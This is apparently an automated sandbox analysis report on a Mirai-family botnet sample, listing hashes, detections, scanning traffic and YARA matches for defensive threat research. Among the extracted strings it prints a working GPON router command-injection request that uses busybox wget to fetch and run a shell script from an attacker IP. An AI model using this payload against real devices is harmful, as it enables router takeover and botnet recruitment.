Linux Analysis Report
WU3D24p3h0.elf

Overview

General Information

Sample Name: WU3D24p3h0.elf
Original Sample Name: aa7bec0933c6e3ae75ba8ebcd80298af.elf
Analysis ID: 1345568
MD5: aa7bec0933c6e3ae75ba8ebcd80298af
SHA1: 5508852870443a95501ec1ccb4f48171dc9cee79
SHA256: ec1dd8fe9c2ea023c05097458899dbab73ab5ce4f5b1779f1a67ee2a8a9b1df2
Tags: 32, elf, mirai, sparc

Detection

Mirai
Score: 76
Range: 0 - 100
Whitelisted: false

Signatures

Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected Mirai
Multi AV Scanner detection for submitted file
Uses known network protocols on non-standard ports
Yara signature match
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Name: Mirai
Description: Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

AV Detection

Source: WU3D24p3h0.elf Avira: detected
Source: WU3D24p3h0.elf ReversingLabs: Detection: 50%
Source: WU3D24p3h0.elf Virustotal: Detection: 58%

Networking

Source: global traffic TCP traffic: 192.168.2.23:44628 -> 45.88.90.129:9902
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 72.139.181.31:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 1.128.132.70:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 207.181.230.201:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 182.200.112.157:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 200.74.230.247:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 121.13.136.249:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 118.93.131.52:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 87.227.32.240:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 161.231.255.249:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 53.231.125.122:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 212.191.183.137:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 151.110.230.219:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 44.55.99.235:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 150.70.116.204:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 201.187.172.22:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 207.24.146.69:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 181.52.206.13:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 175.211.197.78:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 157.114.109.80:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 144.21.117.230:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 179.224.250.199:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 97.41.185.132:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 195.138.214.139:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 138.15.251.56:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 34.219.248.142:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 211.167.175.42:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 91.54.62.210:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 35.65.231.144:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 87.164.157.124:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 188.153.152.136:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 65.10.172.242:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 173.8.208.171:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 41.158.191.127:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 117.225.147.116:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 12.207.98.252:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 97.49.241.47:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 64.212.28.193:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 53.52.92.100:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 221.38.80.20:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 129.216.198.42:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 80.243.62.68:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 75.168.220.84:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 123.229.129.17:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 223.44.247.185:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 197.228.220.173:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 124.246.155.59:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 183.37.138.25:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 129.68.98.170:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 209.202.52.4:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 211.91.153.136:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 87.202.62.107:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 41.135.42.123:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 75.137.62.104:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 79.32.47.184:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 37.40.145.15:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 31.22.10.212:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 170.138.166.14:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 207.215.61.195:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 193.195.7.209:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 195.59.226.96:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 148.236.198.107:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 151.215.146.74:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 36.211.182.201:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 77.50.198.181:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 87.58.56.24:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 90.112.80.48:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 42.125.42.144:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 134.101.243.157:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 132.24.134.218:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 92.4.39.133:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 187.53.61.66:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 141.255.255.225:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 14.161.230.224:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 209.119.231.250:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 97.216.49.98:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 205.182.57.222:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 47.34.18.158:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 104.73.104.195:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 124.84.251.178:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 34.73.248.85:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 220.62.37.217:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 8.172.180.6:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 168.51.211.133:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 124.151.134.105:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 65.104.20.28:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 36.148.4.134:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 184.68.54.83:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 141.116.176.36:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 75.83.210.9:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 173.204.159.107:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 38.208.102.131:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 45.174.108.131:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 31.250.81.203:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 43.53.15.99:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 180.191.132.91:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 193.214.173.43:2323
Source: global traffic TCP traffic: 192.168.2.23:29142 -> 207.75.85.223:2323
Source: /tmp/WU3D24p3h0.elf (PID: 6208) Socket: 127.0.0.1::40319
Source: unknown Network traffic detected: HTTP traffic on port 56556 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42740
Source: unknown Network traffic detected: HTTP traffic on port 40886 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52968
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53814
Source: unknown Network traffic detected: HTTP traffic on port 55616 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50306
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41890
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36060
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47198
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36062
Source: unknown Network traffic detected: HTTP traffic on port 57194 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49374
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60590
Source: unknown Network traffic detected: HTTP traffic on port 39526 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53966 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39576
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49370
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59118
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50784
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50786
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52962
Source: unknown Network traffic detected: HTTP traffic on port 49418 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 45592 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41888
Source: unknown Network traffic detected: HTTP traffic on port 44246 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 43488 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56092
Source: unknown Network traffic detected: HTTP traffic on port 60210 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35422 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36186 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42730
Source: unknown Network traffic detected: HTTP traffic on port 39758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 34374 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59588 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 43186 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47188
Source: unknown Network traffic detected: HTTP traffic on port 35340 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 37852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36060 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39562
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47182
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32920
Source: unknown Network traffic detected: HTTP traffic on port 55116 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47180
Source: unknown Network traffic detected: HTTP traffic on port 60336 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50312
Source: unknown Network traffic detected: HTTP traffic on port 59764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55546 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60594
Source: unknown Network traffic detected: HTTP traffic on port 57182 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42726
Source: unknown Network traffic detected: HTTP traffic on port 45712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57650 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40540
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41874
Source: unknown Network traffic detected: HTTP traffic on port 33584 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 39514 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35270 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 48288 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 41980 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52506
Source: unknown Network traffic detected: HTTP traffic on port 54430 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55452 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 41714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 37374
Source: unknown Network traffic detected: HTTP traffic on port 58836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39554
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 37378
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38224
Source: unknown Network traffic detected: HTTP traffic on port 42478 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51652
Source: unknown Network traffic detected: HTTP traffic on port 34038 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54056 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36048
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38226
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38218
Source: unknown Network traffic detected: HTTP traffic on port 60512 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 37594 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40530
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40534
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60128
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 48018
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53328
Source: unknown Network traffic detected: HTTP traffic on port 40174 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 40850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38174
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55986
Source: unknown Network traffic detected: HTTP traffic on port 32804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50298
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54656
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32870
Source: unknown Network traffic detected: HTTP traffic on port 56348 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 46374 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53896 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41338
Source: unknown Network traffic detected: HTTP traffic on port 42172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52480
Source: unknown Network traffic detected: HTTP traffic on port 53598 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 34952 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49640 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42904 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52008
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49298
Source: unknown Network traffic detected: HTTP traffic on port 38122 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50652 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53332
Source: unknown Network traffic detected: HTTP traffic on port 58598 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35876 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32852
Source: unknown Network traffic detected: HTTP traffic on port 53254 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55894 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60030 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56486 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 44880 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50502 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 34538 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57706
Source: unknown Network traffic detected: HTTP traffic on port 37038 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32846
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38152
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54676
Source: unknown Network traffic detected: HTTP traffic on port 56498 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57702
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54674
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32842
Source: unknown Network traffic detected: HTTP traffic on port 48350 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35132 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59466 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 40724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54678
Source: unknown Network traffic detected: HTTP traffic on port 39940 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44826
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53352
Source: unknown Network traffic detected: HTTP traffic on port 41890 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42646
Source: unknown Network traffic detected: HTTP traffic on port 43624 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 46934 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55148 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40460
Source: unknown Network traffic detected: HTTP traffic on port 34940 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53356
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49272
Source: unknown Network traffic detected: HTTP traffic on port 34390 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38146
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57716
Source: unknown Network traffic detected: HTTP traffic on port 47494 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44818
Source: unknown Network traffic detected: HTTP traffic on port 38318 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41306
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40452
Source: unknown Network traffic detected: HTTP traffic on port 38994 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51532 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 40608 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 37930 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42630
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43560
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 45740
Source: unknown Network traffic detected: HTTP traffic on port 36960 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36284 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 46226 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56152 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60892 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60062
Source: unknown Network traffic detected: HTTP traffic on port 39836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51584
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35936
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.90.129
Source: WU3D24p3h0.elf String found in binary or memory: http://45.88.90.129/bins/Rakitin.mips%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
Source: WU3D24p3h0.elf String found in binary or memory: http://45.88.90.129/bins/Rakitin.sh
Source: unknown HTTP traffic detected: POST /GponForm/diag_Form?style/ HTTP/1.1 User-Agent: Hello, World Accept: */* Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://45.88.90.129/bins/Rakitin.sh+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0

System Summary

Source: WU3D24p3h0.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: WU3D24p3h0.elf, type: SAMPLE Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 6210.1.00007fe884011000.00007fe884028000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6210.1.00007fe884011000.00007fe884028000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 6214.1.00007fe884011000.00007fe884028000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6214.1.00007fe884011000.00007fe884028000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 6208.1.00007fe884011000.00007fe884028000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6208.1.00007fe884011000.00007fe884028000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: Process Memory Space: WU3D24p3h0.elf PID: 6208, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: WU3D24p3h0.elf PID: 6210, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: WU3D24p3h0.elf PID: 6214, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: WU3D24p3h0.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: WU3D24p3h0.elf, type: SAMPLE Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: ELF static info symbol of initial sample .symtab present: no
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://45.88.90.129/bins/Rakitin.sh+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://45.88.90.129/bins/Rakitin.sh+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0[scanner] FD%d error while connecting = %d
Source: classification engine Classification label: mal76.troj.linELF@0/0@0/0

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic on port 23 -> 46938
Source: /tmp/WU3D24p3h0.elf (PID: 6208) Queries kernel information via 'uname'
Source: WU3D24p3h0.elf, 6208.1.000056225bdcc000.000056225be31000.rw-.sdmp, WU3D24p3h0.elf, 6210.1.000056225bdcc000.000056225be31000.rw-.sdmp, WU3D24p3h0.elf, 6214.1.000056225bdcc000.000056225be31000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/sparc
Source: WU3D24p3h0.elf, 6208.1.000056225bdcc000.000056225be31000.rw-.sdmp, WU3D24p3h0.elf, 6210.1.000056225bdcc000.000056225be31000.rw-.sdmp, WU3D24p3h0.elf, 6214.1.000056225bdcc000.000056225be31000.rw-.sdmp Binary or memory string: ["V!/etc/qemu-binfmt/sparc
Source: WU3D24p3h0.elf, 6208.1.00007ffd1650f000.00007ffd16530000.rw-.sdmp, WU3D24p3h0.elf, 6210.1.00007ffd1650f000.00007ffd16530000.rw-.sdmp, WU3D24p3h0.elf, 6214.1.00007ffd1650f000.00007ffd16530000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-sparc/tmp/WU3D24p3h0.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/WU3D24p3h0.elf
Source: WU3D24p3h0.elf, 6208.1.00007ffd1650f000.00007ffd16530000.rw-.sdmp, WU3D24p3h0.elf, 6210.1.00007ffd1650f000.00007ffd16530000.rw-.sdmp, WU3D24p3h0.elf, 6214.1.00007ffd1650f000.00007ffd16530000.rw-.sdmp Binary or memory string: /usr/bin/qemu-sparc

Stealing of Sensitive Information

Source: Yara match File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match File source: dump.pcap, type: PCAP